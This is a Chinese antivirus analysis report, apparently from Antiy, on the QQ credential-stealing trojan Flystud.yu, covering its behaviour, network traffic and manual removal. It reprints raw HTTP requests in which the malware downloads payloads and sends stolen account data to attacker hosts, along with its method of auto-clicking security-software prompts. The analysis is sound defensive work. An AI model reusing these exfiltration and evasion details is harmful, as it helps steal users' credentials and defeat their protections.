Trojan/Win32.Flystud.yu[Dropper]分析

一、 病毒标签：
病毒名称： Trojan/Win32.Flystud.yu[Dropper]
病毒类型： 木马
文件 MD5： 67F10826FB06C877AB6EAFE718F07791
公开范围： 完全公开
危害等级： 4
文件长度： 1,541,087 字节
感染系统： Windows98以上版本
开发工具： 易语言

二、 病毒描述：
该恶意代码文件图标伪装成图片文件，诱惑用户点击，病毒运行后创建2个.url文件到%Documents and Settings%\当前所在用户\Favorites目录下，%Documents and Settings%\当前所在用户\My Documents目录下创建一个boy.jpg图片文件，调用函数打开该图片文件来欺骗用户，使用户误认为该文件为正常图片文件而不会产生对该文件的怀疑，之后则后台继续进程恶意操作，遍历进程查找并结束QQ.EXE,在D盘驱动器下创建%Program  Files%\QQ2008目录，连接网络读取文件将读取的代码保存到该目录下重命名为QQ2009.EXE，并隐藏该目录，检测注册表键值查找是否安装QQ2009聊天软件如有则释放SMSS.exe文件，查找含有安全字样的窗口找到之后模拟点击允许操作躲避安全软件主动防御提示。
SMSS.exe 文件行为：当用户点击QQ登陆则调用病毒创建的QQ2009.exe，输入账号密码之后转向本地QQ并登陆使用户不被发现运行完毕后自删除。

QQ2009.EXE文件行为：该文件伪装成QQ2009登录器，该文件主要截取QQ账号及密码之后连接网络将截取的账号及密码通过URL方式发送到指定地址中。

三、 行为分析：
本地行为:
1、        文件运行后会释放以下文件
%Documents and Settings%\当前所在用户\Favorites\外挂作坊官方站 [www.zuowg.com].url
%Documents and Settings%\当前所在用户\Favorites\外挂作坊资源站 [42724920.ys168.com].url
%Program Files%\Tencent\QQ\Users\All Users\QQ\Registry.db
%HomeDrive%\asp.zipb
%HomeDrive%\yz.zipb
D:\Program Files\QQ2008\QQ2009.exe
%Documents and Settings%\当前所在用户\「开始」菜单\程序\腾讯软件\腾讯QQ.LNK
%Documents and Settings%\当前所在用户\「开始」菜单\程序\腾讯QQ.LNK

2、调用函数打开创建的图片文件来欺骗用户，使用户误认为该文件为正常图片文件而不会产生对该文件的怀疑，之后则后台继续进程恶意操作，遍历进程查找QQ.EXE，找到之后调用：taskkill /im qq.exe /f结束QQ进程，检测注册表键值查找是否安装QQ2009聊天软件如有则释放SMSS.exe文件，查找含有以下安全字样的窗口找到之后模拟点击允许操作躲避安全软件主动防御提示。
应用程序网络访问监控
#32770
确定(&o)
button
确定
button
瑞星提示
#32770
确定(&o)
button
确定
button
#32770
总是允许
button
确定
Button

3、SMSS.exe 文件行为：当用户点击QQ登陆则调用病毒创建的QQ2009.exe，输入账号密码之后转向本地QQ并登陆使用户不被发现运行完毕后自删除。

4、QQ2009.EXE文件行为：该文件伪装成QQ2009登录器，主要截取QQ账号及密码之后连接网络将截取的账号及密码通过URL方式发送到指定地址中。
网络行为:
GET /aaaa/2009/qq/zcx/jcguanbi.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aiyigeren1.2.jp.hapt03.cn
Connection: Keep-Alive
描述：连接网络下载病毒文件
GET /aaaa/2009/qq/time/UpNew.asp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aiyigeren1.2.jp.hapt03.cn
Connection: Keep-Alive
描述：连接更新病毒升级信息
GET /ip/1.php?s=219.147.182.*** HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www1.xise***.cn
Connection: Keep-Alive
描述：连接地址点击产生流量
GET /jj/15/mysdgh.asp?username=324345--------219.147.182.***----黑龙江省哈尔滨市电信----2009年7月20日11时34分29秒----1&password=11&op_type=add&submit=ok HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aiyigeren1.2.jp.hapt03.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSCSQTSA=CADCAGJBKPPJNALPFGBBACHK
描述：连接地址回传账号密码信息
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir% 　　　　　 　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　   逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　   当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　　

四、 清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
（1） 使用ATOOL进程管理结束SMSS.EXE病毒进程。
（2） 强行删除病毒下载的大量病毒文件
%Documents and Settings%\当前所在用户\Favorites\外挂作坊官方站 [www.zuowg.com].url
%Documents and Settings%\当前所在用户\Favorites\外挂作坊资源站 [42724920.ys168.com].url
%Program Files%\Tencent\QQ\Users\All Users\QQ\Registry.db
%HomeDrive%\asp.zipb
%HomeDrive%\yz.zipb
D:\Program Files\QQ2008\QQ2009.exe
%Documents and Settings%\当前所在用户\「开始」菜单\程序\腾讯软件\腾讯QQ.LNK
%Documents and Settings%\当前所在用户\「开始」菜单\程序\腾讯QQ.LNK